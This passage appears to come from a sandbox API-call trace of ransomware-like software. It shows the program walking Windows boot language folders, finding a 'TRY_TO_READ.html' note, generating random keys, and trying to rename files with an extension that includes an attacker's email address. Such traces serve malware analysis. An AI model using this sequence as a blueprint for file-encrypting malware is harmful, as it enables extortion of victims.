(HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.630] GetLastError () returned 0x6 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5f8 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35db58 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35db58 | out: hHeap=0x2e0000) returned 1 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5f8 | out: hHeap=0x2e0000) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.630] FindNextFileW (in: hFindFile=0x35db18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.630] GetLastError () returned 0x6 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5f8 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5f8 | out: hHeap=0x2e0000) returned 1 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.630] FindNextFileW (in: hFindFile=0x35db18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.630] GetLastError () returned 0x6 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.630] FindNextFileW (in: hFindFile=0x35db18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.631] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362ce8 [0116.631] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330bd8 [0116.631] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362ce8 | out: pbBuffer=0x362ce8) returned 1 [0116.631] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330bd8 | out: pbBuffer=0x330bd8) returned 1 [0116.631] SetFileAttributesW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.631] lstrlenW (lpString="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30 [0116.631] GetProcessHeap () returned 0x2e0000 [0116.631] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.631] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" [0116.631] lstrcatW (in: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.631] MoveFileExW (lpExistingFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.631] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.631] GetProcessHeap () returned 0x2e0000 [0116.631] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.631] CloseHandle (hObject=0xffffffff) returned 0 [0116.631] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.631] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.631] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.631] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.631] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e648 | out: hHeap=0x2e0000) returned 1 [0116.631] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3506b0 | out: hHeap=0x2e0000) returned 1 [0116.631] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sv-SE\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35db58 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.632] GetLastError () returned 0x6 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350868 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35db98 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35db98 | out: hHeap=0x2e0000) returned 1 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350868 | out: hHeap=0x2e0000) returned 1 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.632] FindNextFileW (in: hFindFile=0x35db58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.632] GetLastError () returned 0x6 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350868 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35db98 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35db98 | out: hHeap=0x2e0000) returned 1 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350868 | out: hHeap=0x2e0000) returned 1 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.632] FindNextFileW (in: hFindFile=0x35db58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.632] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.632] GetLastError () returned 0x6 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350868 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350868 | out: hHeap=0x2e0000) returned 1 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.633] FindNextFileW (in: hFindFile=0x35db58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.633] GetLastError () returned 0x6 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.633] FindNextFileW (in: hFindFile=0x35db58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362df0 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330be8 [0116.633] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362df0 | out: pbBuffer=0x362df0) returned 1 [0116.633] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330be8 | out: pbBuffer=0x330be8) returned 1 [0116.633] SetFileAttributesW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.633] lstrlenW (lpString="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30 [0116.633] GetProcessHeap () returned 0x2e0000 [0116.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.633] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" [0116.633] lstrcatW (in: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.633] MoveFileExW (lpExistingFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.633] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.634] GetProcessHeap () returned 0x2e0000 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.634] CloseHandle (hObject=0xffffffff) returned 0 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3506d8 | out: hHeap=0x2e0000) returned 1 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350700 | out: hHeap=0x2e0000) returned 1 [0116.634] FindFirstFileW (in: lpFileName="C:\\\\Boot\\tr-TR\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35db98 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.634] GetLastError () returned 0x6 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3506d8 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dbd8 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dbd8 | out: hHeap=0x2e0000) returned 1 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3506d8 | out: hHeap=0x2e0000) returned 1 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.634] FindNextFileW (in: hFindFile=0x35db98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.635] GetLastError () returned 0x6 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3506d8 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dbd8 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dbd8 | out: hHeap=0x2e0000) returned 1 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3506d8 | out: hHeap=0x2e0000) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.635] FindNextFileW (in: hFindFile=0x35db98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.635] GetLastError () returned 0x6 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3506d8 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3506d8 | out: hHeap=0x2e0000) returned 1 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.635] FindNextFileW (in: hFindFile=0x35db98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.635] GetLastError () returned 0x6 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.635] FindNextFileW (in: hFindFile=0x35db98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362ef8 [0116.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330bf8 